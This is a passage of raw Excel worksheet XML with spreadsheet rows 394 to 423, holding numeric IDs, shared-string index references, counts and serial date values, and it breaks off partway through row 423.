    <row r="394" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A394" s="3">
        <v>201879</v>
      </c>
      <c r="B394" s="3" t="s">
        <v>107</v>
      </c>
      <c r="C394" s="9" t="s">
        <v>2898</v>
      </c>
      <c r="D394" s="9" t="s">
        <v>2899</v>
      </c>
      <c r="E394" s="9">
        <v>270</v>
      </c>
      <c r="F394" s="9" t="s">
        <v>2900</v>
      </c>
      <c r="G394" s="10">
        <v>41033.938194444447</v>
      </c>
      <c r="H394" s="9">
        <v>41956</v>
      </c>
      <c r="I394" s="9" t="s">
        <v>2901</v>
      </c>
      <c r="J394" s="10">
        <v>41033.300694444442</v>
      </c>
      <c r="K394" s="3" t="s">
        <v>108</v>
      </c>
      <c r="L394" s="4">
        <v>3</v>
      </c>
      <c r="M394" s="4">
        <v>1</v>
      </c>
      <c r="N394" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O394" s="3" t="s">
        <v>707</v>
      </c>
      <c r="P394" s="3"/>
      <c r="Q394" s="3"/>
    </row>
    <row r="395" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A395" s="9">
        <v>202011</v>
      </c>
      <c r="B395" s="9" t="s">
        <v>1186</v>
      </c>
      <c r="C395" s="9" t="s">
        <v>2902</v>
      </c>
      <c r="D395" s="9" t="s">
        <v>2903</v>
      </c>
      <c r="E395" s="9">
        <v>266143</v>
      </c>
      <c r="F395" s="9" t="s">
        <v>2904</v>
      </c>
      <c r="G395" s="10">
        <v>42451.70208333333</v>
      </c>
      <c r="H395" s="9">
        <v>3256506</v>
      </c>
      <c r="I395" s="9" t="s">
        <v>2905</v>
      </c>
      <c r="J395" s="10">
        <v>42356.497916666667</v>
      </c>
      <c r="K395" s="9" t="s">
        <v>1187</v>
      </c>
      <c r="L395" s="7">
        <v>10</v>
      </c>
      <c r="M395" s="7">
        <v>8</v>
      </c>
      <c r="N395" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O395" s="9"/>
      <c r="P395" s="9"/>
      <c r="Q395" s="9"/>
    </row>
    <row r="396" spans="1:17" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A396" s="3">
        <v>202534</v>
      </c>
      <c r="B396" s="3" t="s">
        <v>149</v>
      </c>
      <c r="C396" s="9" t="s">
        <v>2906</v>
      </c>
      <c r="D396" s="9" t="s">
        <v>2907</v>
      </c>
      <c r="E396" s="9">
        <v>685</v>
      </c>
      <c r="F396" s="9" t="s">
        <v>2908</v>
      </c>
      <c r="G396" s="10">
        <v>41093.052083333336</v>
      </c>
      <c r="H396" s="9">
        <v>685</v>
      </c>
      <c r="I396" s="9" t="s">
        <v>2908</v>
      </c>
      <c r="J396" s="10">
        <v>41085.786805555559</v>
      </c>
      <c r="K396" s="3" t="s">
        <v>150</v>
      </c>
      <c r="L396" s="4">
        <v>5</v>
      </c>
      <c r="M396" s="4">
        <v>1</v>
      </c>
      <c r="N396" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O396" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P396" s="3" t="s">
        <v>697</v>
      </c>
      <c r="Q396" s="3"/>
    </row>
    <row r="397" spans="1:17" s="13" customFormat="1" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A397" s="9">
        <v>203193</v>
      </c>
      <c r="B397" s="9" t="s">
        <v>1188</v>
      </c>
      <c r="C397" s="9" t="s">
        <v>2909</v>
      </c>
      <c r="D397" s="9" t="s">
        <v>2910</v>
      </c>
      <c r="E397" s="9">
        <v>4812</v>
      </c>
      <c r="F397" s="9" t="s">
        <v>2911</v>
      </c>
      <c r="G397" s="10">
        <v>39738.530555555553</v>
      </c>
      <c r="H397" s="9">
        <v>4812</v>
      </c>
      <c r="I397" s="9" t="s">
        <v>2911</v>
      </c>
      <c r="J397" s="10">
        <v>39735.976388888892</v>
      </c>
      <c r="K397" s="9" t="s">
        <v>1189</v>
      </c>
      <c r="L397" s="7">
        <v>4</v>
      </c>
      <c r="M397" s="7">
        <v>3</v>
      </c>
      <c r="N397" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O397" s="9"/>
      <c r="P397" s="9"/>
      <c r="Q397" s="9"/>
    </row>
    <row r="398" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A398" s="3">
        <v>203532</v>
      </c>
      <c r="B398" s="3" t="s">
        <v>151</v>
      </c>
      <c r="C398" s="9" t="s">
        <v>2912</v>
      </c>
      <c r="D398" s="9" t="s">
        <v>2913</v>
      </c>
      <c r="E398" s="9">
        <v>18255</v>
      </c>
      <c r="F398" s="9" t="s">
        <v>2914</v>
      </c>
      <c r="G398" s="10">
        <v>41071.964583333334</v>
      </c>
      <c r="H398" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I398" s="9" t="s">
        <v>2915</v>
      </c>
      <c r="J398" s="10">
        <v>41071.851388888892</v>
      </c>
      <c r="K398" s="3" t="s">
        <v>152</v>
      </c>
      <c r="L398" s="4">
        <v>4</v>
      </c>
      <c r="M398" s="4">
        <v>2</v>
      </c>
      <c r="N398" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O398" s="3"/>
      <c r="P398" s="3"/>
      <c r="Q398" s="3"/>
    </row>
    <row r="399" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A399" s="3">
        <v>204409</v>
      </c>
      <c r="B399" s="3" t="s">
        <v>153</v>
      </c>
      <c r="C399" s="9" t="s">
        <v>2916</v>
      </c>
      <c r="D399" s="9" t="s">
        <v>2917</v>
      </c>
      <c r="E399" s="9">
        <v>13</v>
      </c>
      <c r="F399" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G399" s="10">
        <v>39736.490277777775</v>
      </c>
      <c r="H399" s="9">
        <v>1695</v>
      </c>
      <c r="I399" s="9" t="s">
        <v>2418</v>
      </c>
      <c r="J399" s="10">
        <v>39736.486805555556</v>
      </c>
      <c r="K399" s="3" t="s">
        <v>154</v>
      </c>
      <c r="L399" s="4">
        <v>3</v>
      </c>
      <c r="M399" s="4">
        <v>1</v>
      </c>
      <c r="N399" s="3"/>
      <c r="O399" s="3"/>
      <c r="P399" s="3"/>
      <c r="Q399" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="400" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A400" s="9">
        <v>204476</v>
      </c>
      <c r="B400" s="9" t="s">
        <v>1190</v>
      </c>
      <c r="C400" s="9" t="s">
        <v>2918</v>
      </c>
      <c r="D400" s="9" t="s">
        <v>2919</v>
      </c>
      <c r="E400" s="9">
        <v>426671</v>
      </c>
      <c r="F400" s="9" t="s">
        <v>2920</v>
      </c>
      <c r="G400" s="10">
        <v>42816.678472222222</v>
      </c>
      <c r="H400" s="9">
        <v>7275984</v>
      </c>
      <c r="I400" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J400" s="10">
        <v>42815.84097222222</v>
      </c>
      <c r="K400" s="9" t="s">
        <v>1191</v>
      </c>
      <c r="L400" s="7">
        <v>13</v>
      </c>
      <c r="M400" s="7">
        <v>11</v>
      </c>
      <c r="N400" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="401" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A401" s="3">
        <v>204483</v>
      </c>
      <c r="B401" s="3" t="s">
        <v>155</v>
      </c>
      <c r="C401" s="9" t="s">
        <v>2921</v>
      </c>
      <c r="D401" s="9" t="s">
        <v>2922</v>
      </c>
      <c r="E401" s="9">
        <v>2805305</v>
      </c>
      <c r="F401" s="9" t="s">
        <v>2923</v>
      </c>
      <c r="G401" s="10">
        <v>43122.575694444444</v>
      </c>
      <c r="H401" s="9">
        <v>5399734</v>
      </c>
      <c r="I401" s="9" t="s">
        <v>2924</v>
      </c>
      <c r="J401" s="10">
        <v>43122.574305555558</v>
      </c>
      <c r="K401" s="3" t="s">
        <v>156</v>
      </c>
      <c r="L401" s="4">
        <v>7</v>
      </c>
      <c r="M401" s="4">
        <v>5</v>
      </c>
      <c r="N401" s="3"/>
      <c r="O401" s="3"/>
      <c r="P401" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q401" s="3"/>
    </row>
    <row r="402" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A402" s="9">
        <v>204572</v>
      </c>
      <c r="B402" s="9" t="s">
        <v>1192</v>
      </c>
      <c r="C402" s="9" t="s">
        <v>2925</v>
      </c>
      <c r="D402" s="9" t="s">
        <v>2926</v>
      </c>
      <c r="E402" s="9">
        <v>4725</v>
      </c>
      <c r="F402" s="9" t="s">
        <v>2059</v>
      </c>
      <c r="G402" s="10">
        <v>39957.693749999999</v>
      </c>
      <c r="H402" s="9">
        <v>811</v>
      </c>
      <c r="I402" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="J402" s="10">
        <v>39955.697916666664</v>
      </c>
      <c r="K402" s="9" t="s">
        <v>1193</v>
      </c>
      <c r="L402" s="7">
        <v>6</v>
      </c>
      <c r="M402" s="7">
        <v>4</v>
      </c>
      <c r="N402" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="403" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A403" s="3">
        <v>204777</v>
      </c>
      <c r="B403" s="3" t="s">
        <v>157</v>
      </c>
      <c r="C403" s="9" t="s">
        <v>2927</v>
      </c>
      <c r="D403" s="9" t="s">
        <v>2928</v>
      </c>
      <c r="E403" s="9">
        <v>8155</v>
      </c>
      <c r="F403" s="9" t="s">
        <v>2929</v>
      </c>
      <c r="G403" s="10">
        <v>42325.705555555556</v>
      </c>
      <c r="H403" s="9">
        <v>1159478</v>
      </c>
      <c r="I403" s="9" t="s">
        <v>2930</v>
      </c>
      <c r="J403" s="10">
        <v>42325.7</v>
      </c>
      <c r="K403" s="3" t="s">
        <v>158</v>
      </c>
      <c r="L403" s="4">
        <v>7</v>
      </c>
      <c r="M403" s="4">
        <v>5</v>
      </c>
      <c r="N403" s="3"/>
      <c r="O403" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P403" s="3" t="s">
        <v>703</v>
      </c>
      <c r="Q403" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="404" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A404" s="9">
        <v>206384</v>
      </c>
      <c r="B404" s="9" t="s">
        <v>1194</v>
      </c>
      <c r="C404" s="9" t="s">
        <v>2931</v>
      </c>
      <c r="D404" s="9" t="s">
        <v>2932</v>
      </c>
      <c r="E404" s="9">
        <v>2756409</v>
      </c>
      <c r="F404" s="9" t="s">
        <v>2933</v>
      </c>
      <c r="G404" s="10">
        <v>42470.729166666664</v>
      </c>
      <c r="H404" s="9">
        <v>123671</v>
      </c>
      <c r="I404" s="9" t="s">
        <v>2934</v>
      </c>
      <c r="J404" s="10">
        <v>42470.71597222222</v>
      </c>
      <c r="K404" s="9" t="s">
        <v>1195</v>
      </c>
      <c r="L404" s="7">
        <v>11</v>
      </c>
      <c r="M404" s="7">
        <v>8</v>
      </c>
      <c r="N404" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="405" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A405" s="3">
        <v>206526</v>
      </c>
      <c r="B405" s="3" t="s">
        <v>204</v>
      </c>
      <c r="C405" s="9" t="s">
        <v>2935</v>
      </c>
      <c r="D405" s="9" t="s">
        <v>2936</v>
      </c>
      <c r="E405" s="9">
        <v>2548</v>
      </c>
      <c r="F405" s="9" t="s">
        <v>801</v>
      </c>
      <c r="G405" s="10">
        <v>41899.699305555558</v>
      </c>
      <c r="H405" s="9">
        <v>2548</v>
      </c>
      <c r="I405" s="9" t="s">
        <v>801</v>
      </c>
      <c r="J405" s="10">
        <v>41899.699305555558</v>
      </c>
      <c r="K405" s="3" t="s">
        <v>205</v>
      </c>
      <c r="L405" s="4">
        <v>5</v>
      </c>
      <c r="M405" s="4">
        <v>3</v>
      </c>
      <c r="N405" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O405" s="3"/>
      <c r="P405" s="3"/>
      <c r="Q405" s="3"/>
    </row>
    <row r="406" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A406" s="3">
        <v>206964</v>
      </c>
      <c r="B406" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C406" s="9" t="s">
        <v>2937</v>
      </c>
      <c r="D406" s="9" t="s">
        <v>2938</v>
      </c>
      <c r="E406" s="9">
        <v>843463</v>
      </c>
      <c r="F406" s="9" t="s">
        <v>2939</v>
      </c>
      <c r="G406" s="10">
        <v>42503.572222222225</v>
      </c>
      <c r="H406" s="9">
        <v>843463</v>
      </c>
      <c r="I406" s="9" t="s">
        <v>2939</v>
      </c>
      <c r="J406" s="10">
        <v>42503.448611111111</v>
      </c>
      <c r="K406" s="3" t="s">
        <v>207</v>
      </c>
      <c r="L406" s="4">
        <v>15</v>
      </c>
      <c r="M406" s="4">
        <v>13</v>
      </c>
      <c r="N406" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O406" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P406" s="3" t="s">
        <v>703</v>
      </c>
      <c r="Q406" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="407" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A407" s="9">
        <v>207513</v>
      </c>
      <c r="B407" s="9" t="s">
        <v>1196</v>
      </c>
      <c r="C407" s="9" t="s">
        <v>2940</v>
      </c>
      <c r="D407" s="9" t="s">
        <v>2941</v>
      </c>
      <c r="E407" s="9">
        <v>14540</v>
      </c>
      <c r="F407" s="9" t="s">
        <v>2942</v>
      </c>
      <c r="G407" s="10">
        <v>39737.231944444444</v>
      </c>
      <c r="H407" s="9">
        <v>14540</v>
      </c>
      <c r="I407" s="9" t="s">
        <v>2942</v>
      </c>
      <c r="J407" s="10">
        <v>39737.220138888886</v>
      </c>
      <c r="K407" s="9" t="s">
        <v>1197</v>
      </c>
      <c r="L407" s="7">
        <v>2</v>
      </c>
      <c r="M407" s="7">
        <v>1</v>
      </c>
      <c r="N407" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="408" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A408" s="9">
        <v>207521</v>
      </c>
      <c r="B408" s="9" t="s">
        <v>1198</v>
      </c>
      <c r="C408" s="9" t="s">
        <v>2943</v>
      </c>
      <c r="D408" s="9" t="s">
        <v>2944</v>
      </c>
      <c r="E408" s="9">
        <v>1790</v>
      </c>
      <c r="F408" s="9" t="s">
        <v>2945</v>
      </c>
      <c r="G408" s="10">
        <v>39737.227083333331</v>
      </c>
      <c r="H408" s="9">
        <v>1199</v>
      </c>
      <c r="I408" s="9" t="s">
        <v>2569</v>
      </c>
      <c r="J408" s="10">
        <v>39737.227083333331</v>
      </c>
      <c r="K408" s="9" t="s">
        <v>1199</v>
      </c>
      <c r="L408" s="7">
        <v>4</v>
      </c>
      <c r="M408" s="7">
        <v>2</v>
      </c>
      <c r="N408" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="409" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A409" s="3">
        <v>207950</v>
      </c>
      <c r="B409" s="3" t="s">
        <v>208</v>
      </c>
      <c r="C409" s="9" t="s">
        <v>2946</v>
      </c>
      <c r="D409" s="9" t="s">
        <v>2947</v>
      </c>
      <c r="E409" s="9">
        <v>1343161</v>
      </c>
      <c r="F409" s="9" t="s">
        <v>2948</v>
      </c>
      <c r="G409" s="10">
        <v>41718.332638888889</v>
      </c>
      <c r="H409" s="9">
        <v>1647851</v>
      </c>
      <c r="I409" s="9" t="s">
        <v>2949</v>
      </c>
      <c r="J409" s="10">
        <v>41689.939583333333</v>
      </c>
      <c r="K409" s="3" t="s">
        <v>209</v>
      </c>
      <c r="L409" s="4">
        <v>3</v>
      </c>
      <c r="M409" s="4">
        <v>1</v>
      </c>
      <c r="N409" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O409" s="3"/>
      <c r="P409" s="3"/>
      <c r="Q409" s="3"/>
    </row>
    <row r="410" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A410" s="9">
        <v>208105</v>
      </c>
      <c r="B410" s="9" t="s">
        <v>1200</v>
      </c>
      <c r="C410" s="9" t="s">
        <v>2950</v>
      </c>
      <c r="D410" s="9" t="s">
        <v>2951</v>
      </c>
      <c r="E410" s="9">
        <v>27929</v>
      </c>
      <c r="F410" s="9" t="s">
        <v>2952</v>
      </c>
      <c r="G410" s="10">
        <v>42011.022916666669</v>
      </c>
      <c r="H410" s="9">
        <v>3001736</v>
      </c>
      <c r="I410" s="9" t="s">
        <v>2953</v>
      </c>
      <c r="J410" s="10">
        <v>41988.621527777781</v>
      </c>
      <c r="K410" s="9" t="s">
        <v>1201</v>
      </c>
      <c r="L410" s="7">
        <v>11</v>
      </c>
      <c r="M410" s="7">
        <v>9</v>
      </c>
      <c r="N410" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="411" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A411" s="3">
        <v>208106</v>
      </c>
      <c r="B411" s="3" t="s">
        <v>210</v>
      </c>
      <c r="C411" s="9" t="s">
        <v>2954</v>
      </c>
      <c r="D411" s="9" t="s">
        <v>2955</v>
      </c>
      <c r="E411" s="9">
        <v>9021</v>
      </c>
      <c r="F411" s="9" t="s">
        <v>2281</v>
      </c>
      <c r="G411" s="10">
        <v>42675.976388888892</v>
      </c>
      <c r="H411" s="9">
        <v>2377343</v>
      </c>
      <c r="I411" s="9" t="s">
        <v>2956</v>
      </c>
      <c r="J411" s="10">
        <v>42592.517361111109</v>
      </c>
      <c r="K411" s="3" t="s">
        <v>211</v>
      </c>
      <c r="L411" s="4">
        <v>9</v>
      </c>
      <c r="M411" s="4">
        <v>7</v>
      </c>
      <c r="N411" s="3"/>
      <c r="O411" s="3" t="s">
        <v>706</v>
      </c>
      <c r="P411" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q411" s="3"/>
    </row>
    <row r="412" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A412" s="9">
        <v>208433</v>
      </c>
      <c r="B412" s="9" t="s">
        <v>1202</v>
      </c>
      <c r="C412" s="9" t="s">
        <v>2957</v>
      </c>
      <c r="D412" s="9" t="s">
        <v>2958</v>
      </c>
      <c r="E412" s="9">
        <v>18511</v>
      </c>
      <c r="F412" s="9" t="s">
        <v>2001</v>
      </c>
      <c r="G412" s="10">
        <v>42116.901388888888</v>
      </c>
      <c r="H412" s="9">
        <v>1497596</v>
      </c>
      <c r="I412" s="9" t="s">
        <v>2959</v>
      </c>
      <c r="J412" s="10">
        <v>42116.76666666667</v>
      </c>
      <c r="K412" s="9" t="s">
        <v>1203</v>
      </c>
      <c r="L412" s="7">
        <v>6</v>
      </c>
      <c r="M412" s="7">
        <v>4</v>
      </c>
      <c r="N412" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="413" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A413" s="9">
        <v>209661</v>
      </c>
      <c r="B413" s="9" t="s">
        <v>1204</v>
      </c>
      <c r="C413" s="9" t="s">
        <v>2960</v>
      </c>
      <c r="D413" s="9" t="s">
        <v>2961</v>
      </c>
      <c r="E413" s="9">
        <v>419</v>
      </c>
      <c r="F413" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G413" s="10">
        <v>39883.688888888886</v>
      </c>
      <c r="H413" s="9">
        <v>5640</v>
      </c>
      <c r="I413" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J413" s="10">
        <v>39883.679166666669</v>
      </c>
      <c r="K413" s="9" t="s">
        <v>1205</v>
      </c>
      <c r="L413" s="7">
        <v>4</v>
      </c>
      <c r="M413" s="7">
        <v>2</v>
      </c>
      <c r="Q413" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="414" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A414" s="3">
        <v>209703</v>
      </c>
      <c r="B414" s="3" t="s">
        <v>296</v>
      </c>
      <c r="C414" s="9" t="s">
        <v>2962</v>
      </c>
      <c r="D414" s="9" t="s">
        <v>2963</v>
      </c>
      <c r="E414" s="9">
        <v>419</v>
      </c>
      <c r="F414" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G414" s="10">
        <v>41658.411111111112</v>
      </c>
      <c r="H414" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I414" s="9" t="s">
        <v>2964</v>
      </c>
      <c r="J414" s="10">
        <v>41658.376388888886</v>
      </c>
      <c r="K414" s="3" t="s">
        <v>297</v>
      </c>
      <c r="L414" s="4">
        <v>3</v>
      </c>
      <c r="M414" s="4">
        <v>1</v>
      </c>
      <c r="N414" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O414" s="3"/>
      <c r="P414" s="3"/>
      <c r="Q414" s="3"/>
    </row>
    <row r="415" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A415" s="9">
        <v>209806</v>
      </c>
      <c r="B415" s="9" t="s">
        <v>1206</v>
      </c>
      <c r="C415" s="9" t="s">
        <v>2965</v>
      </c>
      <c r="D415" s="9" t="s">
        <v>2966</v>
      </c>
      <c r="E415" s="9">
        <v>305</v>
      </c>
      <c r="F415" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="G415" s="10">
        <v>39737.82708333333</v>
      </c>
      <c r="H415" s="9">
        <v>305</v>
      </c>
      <c r="I415" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="J415" s="10">
        <v>39737.826388888891</v>
      </c>
      <c r="K415" s="9" t="s">
        <v>1207</v>
      </c>
      <c r="L415" s="7">
        <v>3</v>
      </c>
      <c r="M415" s="7">
        <v>1</v>
      </c>
      <c r="N415" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="416" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A416" s="9">
        <v>209987</v>
      </c>
      <c r="B416" s="9" t="s">
        <v>1208</v>
      </c>
      <c r="C416" s="9" t="s">
        <v>2967</v>
      </c>
      <c r="D416" s="9" t="s">
        <v>2968</v>
      </c>
      <c r="E416" s="9">
        <v>845414</v>
      </c>
      <c r="F416" s="9" t="s">
        <v>2969</v>
      </c>
      <c r="G416" s="10">
        <v>43233.814583333333</v>
      </c>
      <c r="H416" s="9">
        <v>845414</v>
      </c>
      <c r="I416" s="9" t="s">
        <v>2969</v>
      </c>
      <c r="J416" s="10">
        <v>43233.814583333333</v>
      </c>
      <c r="K416" s="9" t="s">
        <v>1209</v>
      </c>
      <c r="L416" s="7">
        <v>3</v>
      </c>
      <c r="M416" s="7">
        <v>1</v>
      </c>
      <c r="N416" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="417" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A417" s="3">
        <v>210850</v>
      </c>
      <c r="B417" s="3" t="s">
        <v>298</v>
      </c>
      <c r="C417" s="9" t="s">
        <v>2970</v>
      </c>
      <c r="D417" s="9" t="s">
        <v>2971</v>
      </c>
      <c r="E417" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F417" s="9" t="s">
        <v>2972</v>
      </c>
      <c r="G417" s="10">
        <v>40318.322222222225</v>
      </c>
      <c r="H417" s="9">
        <v>24545</v>
      </c>
      <c r="I417" s="9" t="s">
        <v>2973</v>
      </c>
      <c r="J417" s="10">
        <v>39992.601388888892</v>
      </c>
      <c r="K417" s="3" t="s">
        <v>299</v>
      </c>
      <c r="L417" s="4">
        <v>5</v>
      </c>
      <c r="M417" s="4">
        <v>3</v>
      </c>
      <c r="N417" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O417" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P417" s="3"/>
      <c r="Q417" s="3"/>
    </row>
    <row r="418" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A418" s="9">
        <v>211383</v>
      </c>
      <c r="B418" s="9" t="s">
        <v>1210</v>
      </c>
      <c r="C418" s="9" t="s">
        <v>2974</v>
      </c>
      <c r="D418" s="9" t="s">
        <v>2975</v>
      </c>
      <c r="E418" s="9">
        <v>4342498</v>
      </c>
      <c r="F418" s="9" t="s">
        <v>2976</v>
      </c>
      <c r="G418" s="10">
        <v>42816.502083333333</v>
      </c>
      <c r="H418" s="9">
        <v>7275984</v>
      </c>
      <c r="I418" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J418" s="10">
        <v>42815.873611111114</v>
      </c>
      <c r="K418" s="9" t="s">
        <v>1211</v>
      </c>
      <c r="L418" s="7">
        <v>7</v>
      </c>
      <c r="M418" s="7">
        <v>5</v>
      </c>
      <c r="N418" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="419" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A419" s="9">
        <v>212264</v>
      </c>
      <c r="B419" s="9" t="s">
        <v>1212</v>
      </c>
      <c r="C419" s="9" t="s">
        <v>2977</v>
      </c>
      <c r="D419" s="9" t="s">
        <v>2978</v>
      </c>
      <c r="E419" s="9">
        <v>2915</v>
      </c>
      <c r="F419" s="9" t="s">
        <v>2740</v>
      </c>
      <c r="G419" s="10">
        <v>39738.628472222219</v>
      </c>
      <c r="H419" s="9">
        <v>12067</v>
      </c>
      <c r="I419" s="9" t="s">
        <v>2979</v>
      </c>
      <c r="J419" s="10">
        <v>39738.589583333334</v>
      </c>
      <c r="K419" s="9" t="s">
        <v>1213</v>
      </c>
      <c r="L419" s="7">
        <v>4</v>
      </c>
      <c r="M419" s="7">
        <v>2</v>
      </c>
      <c r="N419" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="420" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A420" s="3">
        <v>213177</v>
      </c>
      <c r="B420" s="3" t="s">
        <v>300</v>
      </c>
      <c r="C420" s="9" t="s">
        <v>2980</v>
      </c>
      <c r="D420" s="9" t="s">
        <v>2981</v>
      </c>
      <c r="E420" s="9">
        <v>28558</v>
      </c>
      <c r="F420" s="9" t="s">
        <v>2982</v>
      </c>
      <c r="G420" s="10">
        <v>43524.594444444447</v>
      </c>
      <c r="H420" s="9">
        <v>314166</v>
      </c>
      <c r="I420" s="9" t="s">
        <v>2983</v>
      </c>
      <c r="J420" s="10">
        <v>43524.544444444444</v>
      </c>
      <c r="K420" s="3" t="s">
        <v>301</v>
      </c>
      <c r="L420" s="4">
        <v>4</v>
      </c>
      <c r="M420" s="4">
        <v>1</v>
      </c>
      <c r="N420" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O420" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P420" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q420" s="3"/>
    </row>
    <row r="421" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A421" s="3">
        <v>213531</v>
      </c>
      <c r="B421" s="3" t="s">
        <v>334</v>
      </c>
      <c r="C421" s="9" t="s">
        <v>2984</v>
      </c>
      <c r="D421" s="9" t="s">
        <v>2985</v>
      </c>
      <c r="E421" s="9">
        <v>14048</v>
      </c>
      <c r="F421" s="9" t="s">
        <v>2986</v>
      </c>
      <c r="G421" s="10">
        <v>39762.949305555558</v>
      </c>
      <c r="H421" s="9">
        <v>14048</v>
      </c>
      <c r="I421" s="9" t="s">
        <v>2986</v>
      </c>
      <c r="J421" s="10">
        <v>39738.809027777781</v>
      </c>
      <c r="K421" s="3" t="s">
        <v>335</v>
      </c>
      <c r="L421" s="4">
        <v>2</v>
      </c>
      <c r="M421" s="4">
        <v>1</v>
      </c>
      <c r="N421" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O421" s="3"/>
      <c r="P421" s="3"/>
      <c r="Q421" s="3"/>
    </row>
    <row r="422" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A422" s="3">
        <v>214717</v>
      </c>
      <c r="B422" s="3" t="s">
        <v>336</v>
      </c>
      <c r="C422" s="9" t="s">
        <v>2987</v>
      </c>
      <c r="D422" s="9" t="s">
        <v>2988</v>
      </c>
      <c r="E422" s="9">
        <v>14660</v>
      </c>
      <c r="F422" s="9" t="s">
        <v>2989</v>
      </c>
      <c r="G422" s="10">
        <v>42199.822222222225</v>
      </c>
      <c r="H422" s="9">
        <v>40468</v>
      </c>
      <c r="I422" s="9" t="s">
        <v>2990</v>
      </c>
      <c r="J422" s="10">
        <v>42195.856249999997</v>
      </c>
      <c r="K422" s="3" t="s">
        <v>337</v>
      </c>
      <c r="L422" s="4">
        <v>4</v>
      </c>
      <c r="M422" s="4">
        <v>2</v>
      </c>
      <c r="N422" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O422" s="3"/>
      <c r="P422" s="3"/>
      <c r="Q422" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="423" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A423" s="3">
        <v>214758</v>
      </c>
      <c r="B423" s="3" t="s">
        <v>338</v>
      </c>
      <c r="C423" s="9" t="s">
        <v>2991</v>
      </c>
      <c r="D423" s="9" t="s">
        <v>2992</v>
      </c>
      <c r="E423" s="9">
        <v>26095</v>
      </c>
      <c r="F423" s="9" t="s">
        <v>2993</v>
      </c>
      <c r="G423" s="10">
        <v>43121.681944444441</v>
      </c>
      <c r="H423" s="9">
        <v>5363171</v>
      </c>
      <c r="I423" s="9" t="s">
        <v>2994</v>
      </c>
      <c r="J423" s="10">
        <v>43120.911111111112</v>
      </c>
      <c r="K423" s="3" t="s">
        <v>339</v>
      </c>
      <c r="L423" s="4">
        <v>5</v>
      </c>
      <c r="M423" s="4">
        <v>3</v>
      </c>
      <c r="N423" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O423" s="3"/>
      <c r="P423" s="3"/>
